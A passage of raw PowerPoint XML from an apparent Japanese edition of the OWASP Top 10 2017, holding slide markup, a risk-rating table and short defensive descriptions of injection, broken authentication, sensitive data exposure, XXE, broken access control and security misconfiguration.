                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Common Weakness Enumeration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CWE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に沿った名称としています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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44491261"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="60360" y="6364938"/>
          <a:ext cx="4388400" cy="1029720"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="810000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">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脅威</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="6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エージェント</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="6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悪用のしやすさ</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弱点の蔓延度</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弱点の</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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検出しやすさ</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技術面への影響</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ビジネス</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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への影響</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30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850" b="1" i="0" kern="120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アプリケーションによる</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="850" b="1" i="0" kern="120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ja-JP" alt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900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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900" b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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ja-JP" alt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900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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ja-JP" alt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900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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900" b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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ja-JP" alt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altLang="ja-JP"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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900" b="1" i="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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85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5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30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800" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                          <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>平均的</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2</a:t>
                      </a:r>
                      <a:endPar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ja-JP" altLang="en-US" sz="7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7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8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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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rPr>
                        <a:t>平均的</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2</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ja-JP" altLang="en-US" sz="8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中程度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="8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2</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val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="230400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>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rPr>
                        <a:t>困難</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1</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rPr>
                        <a:t>まれ</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1</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rPr>
                        <a:t>困難</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1</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rPr>
                        <a:t>少ない</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1</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201614069"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="5268034"/>
          <a:ext cx="2236914" cy="4667995"/>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378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b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>参考資料</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300075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <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Article on Threat/Risk Modeling</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57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1300" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>外部資料</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" charset="-128"/>
                        <a:ea typeface="Meiryo" charset="-128"/>
                        <a:cs typeface="Meiryo" charset="-128"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="8280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 Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="100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Std</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 ISMS</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Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションセキュリティリスク</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="1141970"/>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altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</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インジェクション、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</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インジェクション、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS</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コマンドインジェクション、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LDAP</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インジェクションといったインジェクションに関する脆弱性は、コマンドやクエリの一部として信頼されないデータが送信される場合に発生します。攻撃コードはインタープリタを騙し、意図しないコマンドの実行や、権限を有していないデータへのアクセスを引き起こしま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0" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="1082570"/>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A1:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>インジェクション</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1" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="1984864"/>
            <a:ext cx="5218177" cy="63900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認証やセッション管理に関連するアプリケーションの機能は、不適切に実装されていることがあります。不適切な実装により攻撃者は、パスワード、鍵、セッショントークンを侵害したり、他の実装上の欠陥により、一時的または永続的に他のユーザーの認証情報を取得しま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2" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="1952466"/>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A2:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>認証の不備</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3" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="2854763"/>
            <a:ext cx="5218177" cy="666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多くのウェブアプリケーションや</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</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では、財務情報、健康情報や個人情報といった機微な情報を適切に保護していません。攻撃者は、このように適切に保護されていないデータを窃取または改ざんして、クレジットカード詐欺、個人情報の窃取やその他の犯罪を行う可能性があります。 機微な情報は特別な措置を講じないでいると損なわれることでしょう。保存や送信する時に暗号化を施すことや、ブラウザ経由でやり取りを行う際には安全対策を講じることなどが必要です。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4" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="282236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A3:2017- </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>機微な情報の露出</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5" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="3715334"/>
            <a:ext cx="5218177" cy="610761"/>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多くの古くて構成の悪い</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>プロセッサーにおいては、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文書内の外部エンティティ参照を指定することができます。 外部エンティティは、ファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ハンドラ、内部ファイル共有、内部ポートスキャン、リモートコード実行、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>（</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サービス拒否）攻撃により、内部ファイルを漏えいさせます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="12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6" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="3694295"/>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A4:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部エンティティ参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="4559111"/>
            <a:ext cx="5218177" cy="64228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権限があるもののみが許可されていることに関する制御が適切に実装されていないことがあります。攻撃者は、このタイプの脆弱性を悪用して、他のユーザのアカウントへのアクセス、機密ファイルの表示、他のユーザのデータの変更、アクセス権の変更など、権限のない機能やデータにアクセスしま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8" name="Freeform 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="4564191"/>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A5:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アクセス制御の不備</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9" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490401" y="5383684"/>
            <a:ext cx="5218177" cy="81825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不適切なセキュリティの設定は、最も一般的に見られる問題です。これは通常、安全でないデフォルト設定、不完全またはアドホックな設定、公開されたクラウドストレージ、不適切な設定の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ヘッダ、機微な情報を含む冗長なエラーメッセージによりもたらされます。 すべてのオペレーティングシステム、フレームワーク、ライブラリ、アプリケーションを安全に設定するだけでなく、それらに適切なタイミングでパッチを当てることやアップグレードをすることが求められま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0" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="5434087"/>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1" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="6312981"/>
            <a:ext cx="5218177" cy="68760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Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
